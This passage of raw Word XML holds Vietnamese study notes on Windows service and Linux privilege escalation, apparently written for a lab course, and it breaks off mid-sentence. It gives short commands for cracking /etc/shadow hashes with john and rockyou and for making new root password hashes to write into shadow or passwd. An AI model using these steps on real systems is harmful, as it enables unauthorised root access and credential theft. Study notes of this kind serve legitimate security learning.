        <w:t>các Windows Services được quản lý bởi Service Control Manager (SCM). đây là một quy trình chịu trách nhiệm quản lý</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>trạng thái của các dịch vụ khi cần, check trạng thái của bất kỳ dvu nào và có thể cấu hình các dịch vụ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6883023D" w14:textId="76ED2CBF" w:rsidR="00AA7210" w:rsidRDefault="00AA7210" w:rsidP="00AA7210">
      <w:r>
        <w:t>Mỗi dịch vụ sẽ có một tệp thực thi liên quan sẽ được SCM chạy bất cứ khi nào một dịch vụ được khởi động. Mỗi dịch vụ cug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>chỉ định acc của user nào mà nó sẽ chạy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4CDA57" w14:textId="0336E14D" w:rsidR="00AA7210" w:rsidRDefault="00AA7210" w:rsidP="00AA7210">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Insecure Permissions on Service Executable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>quyền không an toàn trên dvu có thể exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4D9E2E" w14:textId="3A9165D1" w:rsidR="00AA7210" w:rsidRDefault="00AA7210" w:rsidP="00AA7210">
      <w:r>
        <w:t>Nếu file exe được liên kết với một dịch vụ có các quyền yếu cho phép attacker có thể sửa đổi hoặc thay thế nó, từ đó có thể giành được các đặc quyền của acc dvu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A95657C" w14:textId="77777777" w:rsidR="00AA7210" w:rsidRDefault="00AA7210" w:rsidP="00AA7210">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Unquoted Service Paths - đường dẫn chưa đc trích dẫn: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FBE41B" w14:textId="3D867F67" w:rsidR="00AA7210" w:rsidRDefault="00AA7210" w:rsidP="00AA7210">
      <w:r>
        <w:t>Khi mà không thể ghi vào các file exe như trên, vẫn có thể buộc một dịch vụ chạy các tệp thực thi tùy ý bằng cách sử dụng một tính năng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CECA3A6" w14:textId="77777777" w:rsidR="00AA7210" w:rsidRDefault="00AA7210" w:rsidP="00AA7210">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Insecure Service Permissions - quyền dịch vụ không an toàn </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD26849" w14:textId="7BA04A16" w:rsidR="00AA7210" w:rsidRDefault="00AA7210" w:rsidP="00AA7210">
      <w:r>
        <w:t xml:space="preserve">Nếu DACL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(DS ksoat truy cập -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Discretionary Access Control List</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>thực thi của dịch vụ được cấu hình và đường dẫn đến file exe được trích dẫn đúng, nó cho phép sử đổi cấu hình dịch vụ → cấu hình lại đi→ có thể trỏ đến bất kỳ file thực thi nào mà muốn và chạy nó với bất kỳ tài khoản nào muốn và gồm cả SYSTEM chính</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4718EA" w14:textId="4FEA3B03" w:rsidR="00AA7210" w:rsidRPr="00AA7210" w:rsidRDefault="00AA7210" w:rsidP="00AA7210">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hoàn thành các task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582C4E8F" w14:textId="7F6F6B15" w:rsidR="00AA7210" w:rsidRDefault="00AA7210" w:rsidP="00AA7210">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>----------------------(Linux PrivESC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12581C19" w14:textId="77777777" w:rsidR="00AA7210" w:rsidRDefault="00AA7210" w:rsidP="00AA7210">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA7210">
        <w:t xml:space="preserve">Weak File Permissions - Readable /etc/shadow </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FB8324" w14:textId="77777777" w:rsidR="001B00D7" w:rsidRDefault="00AA7210" w:rsidP="00AA7210">
      <w:r w:rsidRPr="00AA7210">
        <w:t>Tệp /etc/shadow chứa các hàm băm mật khẩu người dùng và thường chỉ root mới có thể đọc được. lấy mật khẩu đc mã hóa bằng john the ripper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D8DC46" w14:textId="3E99B59C" w:rsidR="00AA7210" w:rsidRPr="001B00D7" w:rsidRDefault="00AA7210" w:rsidP="00AA7210">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B00D7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706C08F3" w14:textId="29D903C1" w:rsidR="001B00D7" w:rsidRDefault="00AA7210" w:rsidP="00AA7210">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7210">
        <w:t>Weak File Permissions - Writable /etc/shadow tạo 1 pass khác cho root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46618B8D" w14:textId="77777777" w:rsidR="001B00D7" w:rsidRPr="001B00D7" w:rsidRDefault="001B00D7" w:rsidP="001B00D7">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B00D7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">mkpasswd -m sha-512 newpasswordhere </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0571D40A" w14:textId="27338108" w:rsidR="00AA7210" w:rsidRDefault="001B00D7" w:rsidP="001B00D7">
      <w:r>
        <w:t>→ tạo một password hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44024DC1" w14:textId="77777777" w:rsidR="001B00D7" w:rsidRPr="001B00D7" w:rsidRDefault="001B00D7" w:rsidP="001B00D7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B00D7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Weak File Permissions - Writable /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276DCEFD" w14:textId="77777777" w:rsidR="001B00D7" w:rsidRPr="001B00D7" w:rsidRDefault="001B00D7" w:rsidP="001B00D7">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US" w:eastAsia="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B00D7">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>openssl passwd newpasswordhere</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAA8CA3" w14:textId="77777777" w:rsidR="001B00D7" w:rsidRPr="001B00D7" w:rsidRDefault="001B00D7" w:rsidP="001B00D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B00D7">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>→ tạo một password hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB568DE" w14:textId="77777777" w:rsidR="001B00D7" w:rsidRPr="001B00D7" w:rsidRDefault="001B00D7" w:rsidP="001B00D7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B00D7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sudo - Shell Escape Sequences</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3984DAF3" w14:textId="77777777" w:rsidR="001B00D7" w:rsidRPr="001B00D7" w:rsidRDefault="001B00D7" w:rsidP="001B00D7">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US" w:eastAsia="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B00D7">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D06F00" w14:textId="77777777" w:rsidR="001B00D7" w:rsidRPr="001B00D7" w:rsidRDefault="001B00D7" w:rsidP="001B00D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B00D7">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>→ list các programs cho phép người dùng chạy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F624D1" w14:textId="3E363CC4" w:rsidR="001B00D7" w:rsidRPr="001B00D7" w:rsidRDefault="001B00D7" w:rsidP="00E93904">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B00D7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sudo - Environment Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DFB60C" w14:textId="19A031D6" w:rsidR="002D4A21" w:rsidRPr="00E93904" w:rsidRDefault="001B00D7" w:rsidP="00E93904">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B00D7">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>Sudo có thể được định cấu hình để kế thừa các biến môi trường nhất định từ môi trường của người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0C05FA"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Cron Jobs - File permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214DEF62" w14:textId="0CF01538" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="119" w:after="0" w:line="321" w:lineRule="auto"/>
        <w:ind w:right="309"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Cron </w:t>
      </w:r>
      <w:r w:rsidR="00665E18">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Jobs </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>là các chương trình hoặc tập lệnh mà người dùng có thể lên lịch để chạy vào những thời điểm hoặc khoảng</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thời</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gian</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cụ</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thể.</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tệp</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bảng</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>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rontabs)</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lưu</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trữ</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cấu</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hình</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cho</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>các</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>công</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>việc</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cron.</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Crontab</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hệ</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thống</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>được đặt tại</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/etc/crontab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E558D8" w14:textId="75A14633" w:rsidR="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="00665E18">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5460"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="85" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Xem nội dung của crontab toàn hệ thống:</w:t>
      </w:r>
      <w:r w:rsidR="00665E18">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="470F04A5" w14:textId="3CF2F652" w:rsidR="00665E18" w:rsidRPr="00665E18" w:rsidRDefault="00665E18" w:rsidP="00665E18">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5460"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="85" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00665E18">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>cat /etc/crontab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8E32EF" w14:textId="4AC5EF66" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="78" w:after="0" w:line="321" w:lineRule="auto"/>
        <w:ind w:right="531"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cần</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>có</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hai</w:t>
